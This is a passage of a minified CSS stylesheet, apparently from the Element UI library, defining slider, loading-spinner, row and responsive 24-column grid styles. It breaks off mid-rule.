.el-slider__button:hover{-webkit-transform:scale(1);transform:scale(1);cursor:not-allowed}.el-slider__input{float:right;margin-top:3px;width:130px}.el-slider__input.el-input-number--mini{margin-top:5px}.el-slider__input.el-input-number--medium{margin-top:0}.el-slider__input.el-input-number--large{margin-top:-2px}.el-slider__bar{height:6px;background-color:#409eff;border-top-left-radius:3px;border-bottom-left-radius:3px;position:absolute}.el-slider__button-wrapper{height:36px;width:36px;position:absolute;z-index:1001;top:-15px;-webkit-transform:translateX(-50%);transform:translateX(-50%);background-color:transparent;text-align:center;-webkit-user-select:none;user-select:none;line-height:normal}.el-button,.el-checkbox,.el-checkbox-button__inner,.el-empty__image img,.el-image-viewer__btn,.el-radio,.el-slider__button,.el-slider__button-wrapper,.el-step__icon-inner{-moz-user-select:none;-ms-user-select:none}.el-slider__button-wrapper:after{height:100%}.el-slider__button-wrapper.hover,.el-slider__button-wrapper:hover{cursor:-webkit-grab;cursor:grab}.el-slider__button-wrapper.dragging{cursor:-webkit-grabbing;cursor:grabbing}.el-slider__button{width:16px;height:16px;border:2px solid #409eff;border-radius:50%;-webkit-transition:.2s;transition:.2s;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.el-slider__button.dragging,.el-slider__button.hover,.el-slider__button:hover{-webkit-transform:scale(1.2);transform:scale(1.2)}.el-slider__button.hover,.el-slider__button:hover{cursor:-webkit-grab;cursor:grab}.el-slider__button.dragging{cursor:-webkit-grabbing;cursor:grabbing}.el-slider__stop{position:absolute;height:6px;width:6px;border-radius:100%;-webkit-transform:translateX(-50%);transform:translateX(-50%)}.el-slider__marks{top:0;left:12px;width:18px;height:100%}.el-slider__marks-text{position:absolute;-webkit-transform:translateX(-50%);transform:translateX(-50%);font-size:14px;color:#909399;margin-top:15px}.el-slider.is-vertical{position:relative}.el-slider.is-vertical .el-slider__runway{width:6px;height:100%;margin:0 16px}.el-slider.is-vertical .el-slider__bar{width:6px;height:auto;border-radius:0 0 3px 3px}.el-slider.is-vertical .el-slider__button-wrapper{top:auto;left:-15px}.el-slider.is-vertical .el-slider__button-wrapper,.el-slider.is-vertical .el-slider__stop{-webkit-transform:translateY(50%);transform:translateY(50%)}.el-slider.is-vertical.el-slider--with-input{padding-bottom:58px}.el-slider.is-vertical.el-slider--with-input .el-slider__input{overflow:visible;float:none;position:absolute;bottom:22px;width:36px;margin-top:15px}.el-slider.is-vertical.el-slider--with-input .el-slider__input .el-input__inner{text-align:center;padding-left:5px;padding-right:5px}.el-slider.is-vertical.el-slider--with-input .el-slider__input .el-input-number__decrease,.el-slider.is-vertical.el-slider--with-input .el-slider__input .el-input-number__increase{top:32px;margin-top:-1px;border:1px solid #dcdfe6;line-height:20px;-webkit-box-sizing:border-box;box-sizing:border-box;-webkit-transition:border-color .2s cubic-bezier(.645,.045,.355,1);transition:border-color .2s cubic-bezier(.645,.045,.355,1)}.el-slider.is-vertical.el-slider--with-input .el-slider__input .el-input-number__decrease{width:18px;right:18px;border-bottom-left-radius:4px}.el-slider.is-vertical.el-slider--with-input .el-slider__input .el-input-number__increase{width:19px;border-bottom-right-radius:4px}.el-slider.is-vertical.el-slider--with-input .el-slider__input .el-input-number__increase~.el-input .el-input__inner{border-bottom-left-radius:0;border-bottom-right-radius:0}.el-slider.is-vertical.el-slider--with-input .el-slider__input:hover .el-input-number__decrease,.el-slider.is-vertical.el-slider--with-input .el-slider__input:hover .el-input-number__increase{border-color:#c0c4cc}.el-slider.is-vertical.el-slider--with-input .el-slider__input:active .el-input-number__decrease,.el-slider.is-vertical.el-slider--with-input .el-slider__input:active .el-input-number__increase{border-color:#409eff}.el-slider.is-vertical .el-slider__marks-text{margin-top:0;left:15px;-webkit-transform:translateY(50%);transform:translateY(50%)}.el-loading-parent--relative{position:relative!important}.el-loading-parent--hidden{overflow:hidden!important}.el-loading-mask{position:absolute;z-index:2000;background-color:hsla(0,0%,100%,.9);margin:0;top:0;right:0;bottom:0;left:0;-webkit-transition:opacity .3s;transition:opacity .3s}.el-loading-mask.is-fullscreen{position:fixed}.el-loading-mask.is-fullscreen .el-loading-spinner{margin-top:-25px}.el-loading-mask.is-fullscreen .el-loading-spinner .circular{height:50px;width:50px}.el-loading-spinner{top:50%;margin-top:-21px;width:100%;text-align:center;position:absolute}.el-col-pull-0,.el-col-pull-1,.el-col-pull-2,.el-col-pull-3,.el-col-pull-4,.el-col-pull-5,.el-col-pull-6,.el-col-pull-7,.el-col-pull-8,.el-col-pull-9,.el-col-pull-10,.el-col-pull-11,.el-col-pull-12,.el-col-pull-13,.el-col-pull-14,.el-col-pull-15,.el-col-pull-16,.el-col-pull-17,.el-col-pull-18,.el-col-pull-19,.el-col-pull-20,.el-col-pull-21,.el-col-pull-22,.el-col-pull-23,.el-col-pull-24,.el-col-push-0,.el-col-push-1,.el-col-push-2,.el-col-push-3,.el-col-push-4,.el-col-push-5,.el-col-push-6,.el-col-push-7,.el-col-push-8,.el-col-push-9,.el-col-push-10,.el-col-push-11,.el-col-push-12,.el-col-push-13,.el-col-push-14,.el-col-push-15,.el-col-push-16,.el-col-push-17,.el-col-push-18,.el-col-push-19,.el-col-push-20,.el-col-push-21,.el-col-push-22,.el-col-push-23,.el-col-push-24,.el-row,.el-upload-dragger,.el-upload-list__item{position:relative}.el-loading-spinner .el-loading-text{color:#409eff;margin:3px 0;font-size:14px}.el-loading-spinner .circular{height:42px;width:42px;-webkit-animation:loading-rotate 2s linear infinite;animation:loading-rotate 2s linear infinite}.el-loading-spinner .path{-webkit-animation:loading-dash 1.5s ease-in-out infinite;animation:loading-dash 1.5s ease-in-out infinite;stroke-dasharray:90,150;stroke-dashoffset:0;stroke-width:2;stroke:#409eff;stroke-linecap:round}.el-loading-spinner i{color:#409eff}@-webkit-keyframes loading-rotate{to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}}@keyframes loading-rotate{to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}}@-webkit-keyframes loading-dash{0%{stroke-dasharray:1,200;stroke-dashoffset:0}50%{stroke-dasharray:90,150;stroke-dashoffset:-40px}to{stroke-dasharray:90,150;stroke-dashoffset:-120px}}@keyframes loading-dash{0%{stroke-dasharray:1,200;stroke-dashoffset:0}50%{stroke-dasharray:90,150;stroke-dashoffset:-40px}to{stroke-dasharray:90,150;stroke-dashoffset:-120px}}.el-row{-webkit-box-sizing:border-box;box-sizing:border-box}.el-row:after,.el-row:before{display:table}.el-row:after{clear:both}.el-row--flex{display:-webkit-box;display:-ms-flexbox;display:flex}.el-col-0,.el-row--flex:after,.el-row--flex:before{display:none}.el-row--flex.is-justify-center{-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center}.el-row--flex.is-justify-end{-webkit-box-pack:end;-ms-flex-pack:end;justify-content:flex-end}.el-row--flex.is-justify-space-between{-webkit-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between}.el-row--flex.is-justify-space-around{-ms-flex-pack:distribute;justify-content:space-around}.el-row--flex.is-align-top{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.el-row--flex.is-align-middle{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.el-row--flex.is-align-bottom{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}[class*=el-col-]{float:left;-webkit-box-sizing:border-box;box-sizing:border-box}.el-col-0{width:0}.el-col-pull-0{right:0}.el-col-push-0{left:0}.el-col-1{width:4.16667%}.el-col-offset-1{margin-left:4.16667%}.el-col-pull-1{right:4.16667%}.el-col-push-1{left:4.16667%}.el-col-2{width:8.33333%}.el-col-offset-2{margin-left:8.33333%}.el-col-pull-2{right:8.33333%}.el-col-push-2{left:8.33333%}.el-col-3{width:12.5%}.el-col-offset-3{margin-left:12.5%}.el-col-pull-3{right:12.5%}.el-col-push-3{left:12.5%}.el-col-4{width:16.66667%}.el-col-offset-4{margin-left:16.66667%}.el-col-pull-4{right:16.66667%}.el-col-push-4{left:16.66667%}.el-col-5{width:20.83333%}.el-col-offset-5{margin-left:20.83333%}.el-col-pull-5{right:20.83333%}.el-col-push-5{left:20.83333%}.el-col-6{width:25%}.el-col-offset-6{margin-left:25%}.el-col-pull-6{right:25%}.el-col-push-6{left:25%}.el-col-7{width:29.16667%}.el-col-offset-7{margin-left:29.16667%}.el-col-pull-7{right:29.16667%}.el-col-push-7{left:29.16667%}.el-col-8{width:33.33333%}.el-col-offset-8{margin-left:33.33333%}.el-col-pull-8{right:33.33333%}.el-col-push-8{left:33.33333%}.el-col-9{width:37.5%}.el-col-offset-9{margin-left:37.5%}.el-col-pull-9{right:37.5%}.el-col-push-9{left:37.5%}.el-col-10{width:41.66667%}.el-col-offset-10{margin-left:41.66667%}.el-col-pull-10{right:41.66667%}.el-col-push-10{left:41.66667%}.el-col-11{width:45.83333%}.el-col-offset-11{margin-left:45.83333%}.el-col-pull-11{right:45.83333%}.el-col-push-11{left:45.83333%}.el-col-12{width:50%}.el-col-offset-12{margin-left:50%}.el-col-pull-12{right:50%}.el-col-push-12{left:50%}.el-col-13{width:54.16667%}.el-col-offset-13{margin-left:54.16667%}.el-col-pull-13{right:54.16667%}.el-col-push-13{left:54.16667%}.el-col-14{width:58.33333%}.el-col-offset-14{margin-left:58.33333%}.el-col-pull-14{right:58.33333%}.el-col-push-14{left:58.33333%}.el-col-15{width:62.5%}.el-col-offset-15{margin-left:62.5%}.el-col-pull-15{right:62.5%}.el-col-push-15{left:62.5%}.el-col-16{width:66.66667%}.el-col-offset-16{margin-left:66.66667%}.el-col-pull-16{right:66.66667%}.el-col-push-16{left:66.66667%}.el-col-17{width:70.83333%}.el-col-offset-17{margin-left:70.83333%}.el-col-pull-17{right:70.83333%}.el-col-push-17{left:70.83333%}.el-col-18{width:75%}.el-col-offset-18{margin-left:75%}.el-col-pull-18{right:75%}.el-col-push-18{left:75%}.el-col-19{width:79.16667%}.el-col-offset-19{margin-left:79.16667%}.el-col-pull-19{right:79.16667%}.el-col-push-19{left:79.16667%}.el-col-20{width:83.33333%}.el-col-offset-20{margin-left:83.33333%}.el-col-pull-20{right:83.33333%}.el-col-push-20{left:83.33333%}.el-col-21{width:87.5%}.el-col-offset-21{margin-left:87.5%}.el-col-pull-21{right:87.5%}.el-col-push-21{left:87.5%}.el-col-22{width:91.66667%}.el-col-offset-22{margin-left:91.66667%}.el-col-pull-22{right:91.66667%}.el-col-push-22{left:91.66667%}.el-col-23{width:95.83333%}.el-col-offset-23{margin-left:95.83333%}.el-col-pull-23{right:95.83333%}.el-col-push-23{left:95.83333%}.el-col-24{width:100%}.el-col-offset-24{margin-left:100%}.el-col-pull-24{right:100%}.el-col-push-24{left:100%}@media only screen and (max-width:767px){.el-col-xs-0{display:none;width:0}.el-col-xs-offset-0{margin-left:0}.el-col-xs-pull-0{position:relative;right:0}.el-col-xs-push-0{position:relative;left:0}.el-col-xs-1{width:4.16667%}.el-col-xs-offset-1{margin-left:4.16667%}.el-col-xs-pull-1{position:relative;right:4.16667%}.el-col-xs-push-1{position:relative;left:4.16667%}.el-col-xs-2{width:8.33333%}.el-col-xs-offset-2{margin-left:8.33333%}.el-col-xs-pull-2{position:relative;right:8.33333%}.el-col-xs-push-2{position:relative;left:8.33333%}.el-col-xs-3{width:12.5%}.el-col-xs-offset-3{margin-left:12.5%}.el-col-xs-pull-3{position:relative;right:12.5%}.el-col-xs-push-3{position:relative;left:12.5%}.el-col-xs-4{width:16.66667%}.el-col-xs-offset-4{margin-left:16.66667%}.el-col-xs-pull-4{position:relative;right:16.66667%}.el-col-xs-push-4{position:relative;left:16.66667%}.el-col-xs-5{width:20.83333%}.el-col-xs-offset-5{margin-left:20.83333%}.el-col-xs-pull-5{position:relative;right:20.83333%}.el-col-xs-push-5{position:relative;left:20.83333%}.el-col-xs-6{width:25%}.el-col-xs-offset-6{margin-left:25%}.el-col-xs-pull-6{position:relative;right:25%}.el-col-xs-push-6{position:relative;left:25%}.el-col-xs-7{width:29.16667%}.el-col-xs-offset-7{margin-left:29.16667%}.el-col-xs-pull-7{position:relative;right:29.16667%}.el-col-xs-push-7{position:relative;left:29.16667%}.el-col-xs-8{width:33.33333%}.el-col-xs-offset-8{margin-left:33.33333%}.el-col-xs-pull-8{position:relative;right:33.33333%}.el-col-xs-push-8{position:relative;left:33.33333%}.el-col-xs-9{width:37.5%}.el-col-xs-offset-9{margin-left:37.5%}.el-col-xs-pull-9{position:relative;right:37.5%}.el-col-xs-push-9{position:relative;left:37.5%}.el-col-xs-10{width:41.66667%}.el-col-xs-offset-10{margin-left:41.66667%}.el-col-xs-pull-10{position:relative;right:41.66667%}.el-col-xs-push-10{position:relative;left:41.66667%}.el-col-xs-11{width:45.83333%}.el-col-xs-offset-11{margin-left:45.83333%}.el-col-xs-pull-11{position:relative;right:45.83333%}.el-col-xs-push-11{position:relative;left:45.83333%}.el-col-xs-12{width:50%}.el-col-xs-offset-12{margin-left:50%}.el-col-xs-pull-12{position:relative;right:50%}.el-col-xs-push-12{position:relative;left:50%}.el-col-xs-13{width:54.16667%}.el-col-xs-offset-13{margin-left:54.16667%}.el-col-xs-pull-13{position:relative;right:54.16667%}.el-col-xs-push-13{position:relative;left:54.16667%}.el-col-xs-14{width:58.33333%}.el-col-xs-offset-14{margin-left:58.33333%}.el-col-xs-pull-14{position:relative;right:58.33333%}.el-col-xs-push-14{position:relative;left:58.33333%}.el-col-xs-15{width:62.5%}.el-col-xs-offset-15{margin-left:62.5%}.el-col-xs-pull-15{position:relative;right:62.5%}.el-col-xs-push-15{position:relative;left:62.5%}.el-col-xs-16{width:66.66667%}.el-col-xs-offset-16{margin-left:66.66667%}.el-col-xs-pull-16{position:relative;right:66.66667%}.el-col-xs-push-16{position:relative;left:66.66667%}.el-col-xs-17{width:70.83333%}.el-col-xs-offset-17{margin-left:70.83333%}.el-col-xs-pull-17{position:relative;right:70.83333%}.el-col-xs-push-17{position:relative;left:70.83333%}.el-col-xs-18{width:75%}.el-col-xs-offset-18{margin-left:75%}.el-col-xs-pull-18{position:relative;right:75%}.el-col-xs-push-18{position:relative;left:75%}.el-col-xs-19{width:79.16667%}.el-col-xs-offset-19{margin-left:79.16667%}.el-col-xs-pull-19{position:relative;right:79.16667%}.el-col-xs-push-19{position:relative;left:79.16667%}.el-col-xs-20{width:83.33333%}.el-col-xs-offset-20{margin-left:83.33333%}.el-col-xs-pull-20{position:relative;right:83.33333%}.el-col-xs-push-20{position:relative;left:83.33333%}.el-col-xs-21{width:87.5%}.el-col-xs-offset-21{margin-left:87.5%}.el-col-xs-pull-21{position:relative;right:87.5%}.el-col-xs-push-21{position:relative;left:87.5%}.el-col-xs-22{width:91.66667%}.el-col-xs-offset-22{margin-left:91.66667%}.el-col-xs-pull-22{position:relative;right:91.66667%}.el-col-xs-push-22{position:relative;left:91.66667%}.el-col-xs-23{width:95.83333%}.el-col-xs-offset-23{margin-left:95.83333%}.el-col-xs-pull-23{position:relative;right:95.83333%}.el-col-xs-push-23{position:relative;left:95.83333%}.el-col-xs-24{width:100%}.el-col-xs-offset-24{margin-left:100%}.el-col-xs-pull-24{position:relative;right:100%}.el-col-xs-push-24{position:relative;left:100%}}@media only screen and (min-width:768px){.el-col-sm-0{display:none;width:0}.el-col-sm-offset-0{margin-left:0}.el-col-sm-pull-0{position:relative;right:0}.el-col-sm-push-0{position:relative;left:0}.el-col-sm-1{width:4.16667%}.el-col-sm-offset-1{margin-left:4.16667%}.el-col-sm-pull-1{position:relative;right:4.16667%}.el-col-sm-push-1{position:relative;left:4.16667%}.el-col-sm-2{width:8.33333%}.el-col-sm-offset-2{margin-left:8.33333%}.el-col-sm-pull-2{position:relative;right:8.33333%}.el-col-sm-push-2{position:relative;left:8.33333%}.el-col-sm-3{width:12.5%}.el-col-sm-offset-3{margin-left:12.5%}.el-col-sm-pull-3{position:relative;right:12.5%}.el-col-sm-push-3{position:relative;left:12.5%}.el-col-sm-4{width:16.66667%}.el-col-sm-offset-4{margin-left:16.66667%}.el-col-sm-pull-4{position:relative;right:16.66667%}.el-col-sm-push-4{position:relative;left:16.66667%}.el-col-sm-5{width:20.83333%}.el-col-sm-offset-5{margin-left:20.83333%}.el-col-sm-pull-5{position:relative;right:20.83333%}.el-col-sm-push-5{position:relative;left:20.83333%}.el-col-sm-6{width:25%}.el-col-sm-offset-6{margin-left:25%}.el-col-sm-pull-6{position:relative;right:25%}.el-col-sm-push-6{position:relative;left:25%}.el-col-sm-7{width:29.16667%}.el-col-sm-offset-7{margin-left:29.16667%}.el-col-sm-pull-7{position:relative;right:29.16667%}.el-col-sm-push-7{position:relative;left:29.16667%}.el-col-sm-8{width:33.33333%}.el-col-sm-offset-8{margin-left:33.33333%}.el-col-sm-pull-8{position:relative;right:33.33333%}.el-col-sm-push-8{position:relative;left:33.33333%}.el-col-sm-9{width:37.5%}.el-col-sm-offset-9{margin-left:37.5%}.el-col-sm-pull-9{position:relative;right:37.5%}.el-col-sm-push-9{position:relative;left:37.5%}.el-col-sm-10{width:41.66667%}.el-col-sm-offset-10{margin-left:41.66667%}.el-col-sm-pull-10{position:relative;right:41.66667%}.el-col-sm-push-10{position:relative;left:41.66667%}.el-col-sm-11{width:45.83333%}.el-col-sm-offset-11{margin-left:45.83333%}.el-col-sm-pull-11{position:relative;right:45.83333%}.el-col-sm-push-11{position:relative;left:45.83333%}.el-col-sm-12{width:50%}.el-col-sm-offset-12{margin-left:50%}.el-col-sm-pull-12{position:relative;right:50%}.el-col-sm-push-12{position:relative;left:50%}.el-col-sm-13{width:54.16667%}.el-col-sm-offset-13{margin-left:54.16667%}.el-col-sm-pull-13{position:relative;right:54.16667%}.el-col-sm-push-13{position:relative;left:54.16667%}.el-col-sm-14{width:58.33333%}.el-col-sm-offset-14{margin-left:58.33333%}.el-col-sm-pull-14{position:relative;right:58.33333%}.el-col-sm-push-14{position:relative;left:58.33333%}.el-col-sm-15{width:62.5%}.el-col-sm-offset-15{margin-left:62.5%}.el-col-sm-pull-15{position:relative;right:62.5%}.el-col-sm-push-15{position:relative;left:62.5%}.el-col-sm-16{width:66.66667%}.el-col-sm-offset-16{margin-left:66.66667%}.el-col-sm-pull-16{position:relative;right:66.66667%}.el-col-sm-push-16{position:relative;left:66.66667%}.el-col-sm-17{width:70.83333%}.el-col-sm-offset-17{margin-left:70.83333%}.el-col-sm-pull-17{position:relative;right:70.83333%}.el-col-sm-push-17{position:relative;left:70.83333%}.el-col-sm-18{width:75%}.el-col-sm-offset-18{margin-left:75%}.el-col-sm-pull-18{position:relative;right:75%}.el-col-sm-push-18{position:relative;left:75%}.el-col-sm-19{width:79.16667%}.el-col-sm-offset-19{margin-left:79.16667%}.el-col-sm-pull-19{position:relative;right:79.16667%}.el-col-sm-push-19{position:relative;left:79.16667%}.el-col-sm-20{width:83.33333%}.el-col-sm-offset-20{margin-left:83.33333%}.el-col-sm-pull-20{position:relative;right:83.33333%}.el-col-sm-push-20{position:relative;left:83.33333%}.el-col-sm-21{width:87.5%}.el-col-sm-offset-21{margin-left:87.5%}.el-col-sm-pull-21{position:relative;right:87.5%}.el-col-sm-push-21{position:relative;left:87.5%}.el-col-sm-22{width:91.66667%}.el-col-sm-offset-22{margin-left:91.66667%}.el-col-sm-pull-22{position:relative;right:91.66667%}.el-col-sm-push-22{position:relative;left:91.66667%}.el-col-sm-23{width:95.83333%}.el-col-sm-offset-23{margin-left:95.83333%}.el-col-sm-pull-23{position:relative;right:95.83333%}.el-col-sm-push-23{position:relative;left:95.83333%}.el-col-sm-24{width:100%}.el-col-sm-offset-24{margin-left:100%}.el-col-sm-pull-24{position:relative;right:100%}.el-col-sm-push-24{position:relative;left:100%}}@media only screen and (min-width:992px){.el-col-md-0{display:none;width:0}.el-col-md-offset-0{margin-left:0}.el-col-md-pull-0{position:relative;right:0}.el-col-md-push-0{position:relative;left:0}.el-col-md-1{width:4.16667%}.el-col-md-offset-1{margin-left:4.16667%}.el-col-md-pull-1{position:relative;right:4.16667%}.el-col-md-push-1{position:relative;left:4.16667%}.el-col-md-2{width:8.33333%}.el-col-md-offset-2{margin-left:8.33333%}.el-col-md-pull-2{position:relative;right:8.33333%}.el-col-md-push-2{position:relative;left:8.33333%}.el-col-md-3{width:12.5%}.el-col-md-offset-3{margin-left:12.5%}.el-col-md-pull-3{position:relative;right:12.5%}.el-col-md-push-3{position:relative;left:12.5%}.el-col-md-4{width:16.66667%}.el-col-md-offset-4{margin-left:16.66667%}.el-col-md-pull-4{position:relative;right:16.66667%}.el-col-md-push-4{position:relative;left:16.66667%}.el-col-md-5{width:20.83333%}.el-col-md-offset-5{margin-left:20.83333%}.el-col-md-pull-5{position:relative;right:20.83333%}.el-col-md-push-5{position:relative;left:20.83333%}.el-col-md-6{width:25%}.el-col-md-offset-6{margin-left:25%}.el-col-md-pull-6{position:relative;right:25%}.el-col-md-push-6{position:relative;left:25%}.el-col-md-7{width:29.16667%}.el-col-md-offset-7{margin-left:29.16667%}.el-col-md-pull-7{position:relative;right:29.16667%}.el-col-md-push-7{position:relative;left:29.16667%}.el-col-md-8{width:33.33333%}.el-col-md-offset-8{margin-left:33.33333%}.el-col-md-pull-8{position:relative;right:33.33333%}.el-col-md-push-8{position:relative;left:33.33333%}.el-col-md-9{width:37.5%}.el-col-md-offset-9{margin-left:37.5%}.el-col-md-pull-9{position:relative;right:37.5%}.el-col-md-push-9{position:relative;left:37.5%}.el-col-md-10{width:41.66667%}.el-col-md-offset-10{margin-left:41.66667%}.el-col-md-pull-10{position:relative;right:41.66667%}.el-col-md-push-10{position:relative;left:41.66667%}.el-col-md-11{width:45.83333%}.el-col-md-offset-11{margin-left:45.83333%}.el-col-md-pull-11{position:relative;right:45.83333%}.el-col-md-push-11{position:relative;left:45.83333%}.el-col-md-12{width:50%}.el-col-md-offset-12{margin-left:50%}.el-col-md-pull-12{position:relative;right:50%}.el-col-md-push-12{position:relative;left:50%}.el-col-md-13{width:54.16667%}.el-col-md-offset-13{margin-left:54.16667%}.el-col-md-pull-13{position:relative;right:54.16667%}.el-col-md-push-13{position:relative;left:54.16667%}.el-col-md-14{width:58.33333%}.el-col-md-offset-14{margin-left:58.33333%}.el-col-md-pull-14{position:relative;right:58.33333%}.el-col-md-push-14{position:relative;left:58.33333%}.el-col-md-15{width:62.5%}.el-col-md-offset-15{margin-left:62.5%}.el-col-md-pull-15{position:relative;right:62.5%}.el-col-md-push-15{position:relative;left:62.5%}.el-col-md-16{width:66.66667%}.el-col-md-offset-16{margin-left:66.66667%}.el-col-md-pull-16{position:relative;right:66.66667%}.el-col-md-push-16{position:relative;left:66.66667%}.el-col-md-17{width:70.83333%}.el-col-md-offset-17{margin-left:70.83333%}.el-col-md-pull-17{position:relative;right:70.83333%}.el-col-md-push-17{position:relative;left:70.83333%}.el-col-md-18{width:75%}.el-col-md-offset-18{margin-left:75%}.el-col-md-pull-18{position:relative;right:75%}.el-col-md-push-18{position:relative;left:75%}.el-col-md-19{width:79.16667%}.el-col-md-offset-19{margin-left:79.16667%}.el-col-md-pull-19{position:relative;right:79.16667%}.el-col-md-push-19{position:relative;left:79.16667%}.el-col-md-20{width:83.33333%}.el-col-md-offset-20{margin-left:83.33333%}.el-col-md-pull-20{position:relative;right:83.33333%}.el-col-md-push-20{position:relative;left:83.33333%}.el-col-md-21{width:87.5%}.el-col-md-offset-21{margin-left:87.5%}.el-col-md-pull-21{position:relative;right:87.5%}.el-col-md-push-21{position:relative;left:87.5%}.el-col-md-22{width:91.66667%}.el-col-md-offset-22{margin-left:91.66667%}.el-col-md-pull-22{position:relative;right:91.66667%}.el-col-md-push-22{position:relative;left:91.66667%}.el-col-md-23{width:95.83333%}.el-col-md-offset-23{margin-left:95.83333%}.el-col-md-pull-23{position:relative;right:95.83333%}.el-col-md-push-23{position:relative;left:95.83333%}.el-col-md-24{width:100%}.el-col-md-offset-24{margin-left:100%}.el-col-md-pull-24{position:relative;right:100%}.el-col-md-push-24{position:relative;left:100%}}@media only screen and (min-width:1200px){.el-col-lg-0{display:none;width:0}.el-col-lg-offset-0{margin-left:0}.el-col-lg-pull-0{position:relative;right:0}.el-col-lg-push-0{position:relative;left:0}.el-col-lg-1{width:4.16667%}.el-col-lg-offset-1{margin-left:4.16667%}.el-col-lg-pull-1{position:relative;right:4.16667%}.el-col-lg-push-1{position:relative;left:4.16667%}.el-col-lg-2{width:8.33333%}.el-col-lg-offset-2{margin-left:8.33333%}.el-col-lg-pull-2{position:relative;right:8.33333%}.el-col-lg-push-2{position:relative;left:8.33333%}.el-col-lg-3{width:12.5%}.el-col-lg-offset-3{margin-left:12.5%}.el-col-lg-pull-3{position:relative;right:12.5%}.el-col-lg-push-3{position:relative;left:12.5%}.el-col-lg-4{width:16.66667%}.el-col-lg-offset-4{margin-left:16.66667%}.el-col-lg-pull-4{position:relative;right:16.66667%}.el-col-lg-push-4{position:relative;left:16.66667%}.el-col-lg-5{width:20.83333%}.el-col-lg-offset-5{margin-left:20.83333%}.el-col-lg-pull-5{position:relative;right:20.83333%}.el-col-lg-push-5{position:relative;left:20.83333%}.el-col-lg-6{width:25%}.el-col-lg-offset-6{margin-left:25%}.el-col-lg-pull-6{position:relative;right:25%}.el-col-lg-push-6{position:relative;left:25%}.el-col-lg-7{width:29.16667%}.el-col-lg-offset-7{margin-left:29.16667%}.el-col-lg-pull-7{position:relative;right:29.16667%}.el-col-lg-push-7{position:relative;left:29.16667%}.el-col-lg-8{width:33.33333%}.el-col-lg-offset-8{margin-left:33.33333%}.el-col-lg-pull-8{position:relative;right:33.33333%}.el-col-lg-push-8{position:relative;left:33.33333%}.el-col-lg-9{width:37.5%}.el-col-lg-offset-9{margin-left:37.5%}.el-col-lg-pull-9{position:relative;right:37.5%}.el-col-lg-push-9{position:relative;left:37.5%}.el-col-lg-10{width:41.66667%}.el-col-lg-offset-10{margin-left:41.66667%}.el-col-lg-pull-10{position:relative;right:41.66667%}.el-col-lg-push-10{position:relative;left:41.66667%}.el-col-lg-11{width:45.83333%}.el-col-lg-offset-11{margin-left:45.83333%}.el-col-lg-pull-11{position:relative;right:45.83333%}.el-col-lg-push-11{position:relative;left:45.83333%}.el-col-lg-12{width:50%}.el-col-lg-offset-12{margin-left:50%}.el-col-lg-pull-12{position:relative;right:50%}.el-col-lg-push-12{position:relative;left:50%}.el-col-lg-13{width:54.16667%}.el-col-lg-offset-13{margin-left:54.16667%}.el-col-lg-pull-13{position:relative;right:54.16667%}.el-col-lg-push-13{position:relative;left:54.16667%}.el-col-lg-14{width:58.33333%}.el-col-lg-offset-14{margin-left:58.33333%}.el-col-lg-pull-14{position:relative;right:58.33333%}.el-col-lg-push-14{position:relative;left:58.33333%}.el-col-lg-15{width:62.5%}.el-col-lg-offset-15{margin-left:62.5%}.el-col-lg-pull-15{position:relative;right:62.5%}.el-col-lg-push-15{position:relative;left:62.5%}.el-col-lg-16{width:66.66667%}.el-col-lg-offset-16{margin-left:66.66667%}.el-col-lg-pull-16{position:relative;right:66.66667%}.el-col-lg-push-16{position:relative;left:66.66667%}.el-col-lg-17{width:70.83333%}.el-col-lg-offset-17{margin-left:70.83333%}.el-col-lg-pull-17{position:relative;right:70.83333%}.el-col-lg-push-17{position:relative;left:70.83333%}.el-col-lg-18{width:75%}.el-col-lg-offset-18{margin-left:75%}.el-col-lg-pull-18{position:relative;right:75%}.el-col-lg-push-18{position:relative;left:75%}.el-col-lg-19{width:79.16667%}.el-col-lg-offset-19{margin-left:79.16667%}.el-col-lg-pull-19{position:relative;right:79.16667%}.el-col-lg-push-19{position:relative;left:79.16667%}.el-col-lg-20{width:83.33333%}.el-col-lg-offset-20{margin-left:83.33333%}.el-col-lg-pull-20{position:relative;right:83.33333%}.el-col-lg-push-20{position:relative;left:83.33333%}.el-col-lg-21{width:87.5%}.el-col-lg-offset-21{margin-left:87.5%}.el-col-lg-pull-21{position:relative;right:87.5%}.el-col-lg-push-21{position:relative;left:87.5%}.el-col-lg-22{width:91.66667%}.el-col-lg-offset-22{margin-left:91.66667%}.el-col-lg-pull-22{position:relative;right:91.66667%}.el-col-lg-push-22{position:relative;left:91.66667%}.el-col-lg-23{width:95.83333%}.el-col-lg-offset-23{margin-left:95.83333%}.el-col-lg-pull-23{position:relative;right:95.83333%}.el-col-lg-push-23{position:relative;left:95.83333%}.el-col-lg-24{width:100%}.el-col-lg-offset-24{margin-left:100%}.el-col-lg-pull-24{position:relative;right:100%}.el-col-lg-push-24{position:relative;left:100%}}@media only screen and (min-width:1920px){.el-col-xl-0{display:none;width:0}.el-col-xl-offset-0{margin-left:0}.el-col-xl-pull-0{position:relative;right:0}.el-col-xl-push-0{position:relative;left:0}.el-col-xl-1{width:4.16667%}.el-col-xl-offset-1{margin-left:4.16667%}.el-col-xl-pull-1{position:relative;right:4.16667%}.el-col-xl-push-1{position:relative;left:4.16667%}.el-col-xl-2{width:8.33333%}.el-col-xl-offset-2{margin-left:8.33333%}.el-col-xl-pull-2{position:relative;right:8.33333%}.el-col-xl-push-2{position:relative;left:8.33333%}.el-col-xl-3{width:12.5%}.el-col-xl-offset-3{margin-left:12.5%}.el-col-xl-pull-3{position:relative;right:12.5%}.el-col-xl-push-3{position:relative;left:12.5%}.el-col-xl-4{width:16.66667%}.el-col-xl-offset-4{margin-left:16.66667%}.el-col-xl-pull-4{position:relative;right:16.66667%}.el-col-xl-push-4{position:relative;left:16.66667%}.el-col-xl-5{width:20.83333%}.el-col-xl-offset-5{margin-left:20.83333%}.el-col-xl-pull-5{position:relative;right:20.83333%}.el-col-xl-push-5{position:relative;left:20.83333%}.el-col-xl-6{width:25%}.el-col-xl-offset-6{margin-left:25%}.el-col-xl-pull-6{position:relative;right:25%}.el-col-xl-push-6{position:relative;left:25%}.el-col-xl-7{width:29.16667%}.el-col-xl-offset-7{margin-left:29.16667%}.el-col-